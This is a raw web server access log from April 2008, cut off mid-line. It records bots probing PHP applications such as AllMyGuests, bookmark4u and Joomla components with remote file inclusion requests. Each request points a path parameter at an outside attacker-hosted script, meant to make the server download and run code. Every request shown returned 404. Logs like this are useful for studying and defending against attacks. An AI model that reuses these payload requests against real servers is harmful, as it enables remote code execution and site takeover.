195.130.35.104 - - [27/Apr/2008:19:46:35 -0600] "GET /logs//modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 242 "-" "libwww-perl/5.79"
195.130.35.104 - - [27/Apr/2008:19:46:36 -0600] "GET //modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
67.228.55.26 - - [27/Apr/2008:19:46:44 -0600] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/auction.gif?? HTTP/1.1" 404 232 "-" "libwww-perl/5.811"
212.58.4.204 - - [27/Apr/2008:19:46:54 -0600] "GET /logs//modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 242 "-" "libwww-perl/5.65"
212.58.4.204 - - [27/Apr/2008:19:46:54 -0600] "GET //modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 237 "-" "libwww-perl/5.65"
87.106.46.92 - - [27/Apr/2008:19:46:57 -0600] "GET /logs//modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 242 "-" "libwww-perl/5.803"
87.106.46.92 - - [27/Apr/2008:19:46:57 -0600] "GET //modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 237 "-" "libwww-perl/5.803"
195.130.35.104 - - [27/Apr/2008:19:47:14 -0600] "GET /logs//modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 242 "-" "libwww-perl/5.79"
195.130.35.104 - - [27/Apr/2008:19:47:14 -0600] "GET //modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
195.130.35.104 - - [27/Apr/2008:19:47:22 -0600] "GET /logs//modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 242 "-" "libwww-perl/5.79"
195.130.35.104 - - [27/Apr/2008:19:47:22 -0600] "GET //modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
69.72.211.242 - - [27/Apr/2008:19:47:29 -0600] "GET /logs/error_log.20080406//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://84.32.137.157/incoming/upload/trex/old? HTTP/1.1" 404 279 "-" "libwww-perl/5.811"
69.72.211.242 - - [27/Apr/2008:19:47:29 -0600] "GET /logs/error_log.20080406//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://84.32.137.157/incoming/upload/trex/1? HTTP/1.1" 404 279 "-" "libwww-perl/5.811"
195.130.35.104 - - [27/Apr/2008:19:47:37 -0600] "GET /logs//modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 242 "-" "libwww-perl/5.79"
195.130.35.104 - - [27/Apr/2008:19:47:37 -0600] "GET //modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
195.130.35.104 - - [27/Apr/2008:19:47:42 -0600] "GET /logs//modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 242 "-" "libwww-perl/5.79"
195.130.35.104 - - [27/Apr/2008:19:47:43 -0600] "GET //modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
195.130.35.104 - - [27/Apr/2008:19:47:44 -0600] "GET /logs//modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 242 "-" "libwww-perl/5.79"
195.130.35.104 - - [27/Apr/2008:19:47:44 -0600] "GET //modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
195.130.35.104 - - [27/Apr/2008:19:47:48 -0600] "GET /logs//modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 242 "-" "libwww-perl/5.79"
195.130.35.104 - - [27/Apr/2008:19:47:48 -0600] "GET //modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
200.160.251.134 - - [27/Apr/2008:19:48:58 -0600] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.tocs.xpg.com.br/id.txt?? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
200.160.251.134 - - [27/Apr/2008:19:48:58 -0600] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.tocs.xpg.com.br/id.txt?? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
195.74.37.170 - - [27/Apr/2008:19:49:29 -0600] "GET /logs//modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 242 "-" "libwww-perl/5.808"
195.74.37.170 - - [27/Apr/2008:19:49:30 -0600] "GET //modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 237 "-" "libwww-perl/5.808"
67.228.55.26 - - [27/Apr/2008:19:49:31 -0600] "GET /logs/error_log.20080406//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/lake.jpg????? HTTP/1.1" 404 256 "-" "libwww-perl/5.811"
67.228.55.26 - - [27/Apr/2008:19:49:31 -0600] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/lake.jpg????? HTTP/1.1" 404 232 "-" "libwww-perl/5.811"
67.228.55.26 - - [27/Apr/2008:19:49:31 -0600] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/lake.jpg????? HTTP/1.1" 404 237 "-" "libwww-perl/5.811"
195.74.37.170 - - [27/Apr/2008:19:49:50 -0600] "GET /logs//modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 242 "-" "libwww-perl/5.808"
195.74.37.170 - - [27/Apr/2008:19:49:50 -0600] "GET //modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 237 "-" "libwww-perl/5.808"
213.246.51.45 - - [27/Apr/2008:19:49:51 -0600] "GET /logs/error_log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 257 "-" "libwww-perl/5.805"
67.228.55.26 - - [27/Apr/2008:19:49:53 -0600] "GET /logs/access_log.20080406//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.spacecoloni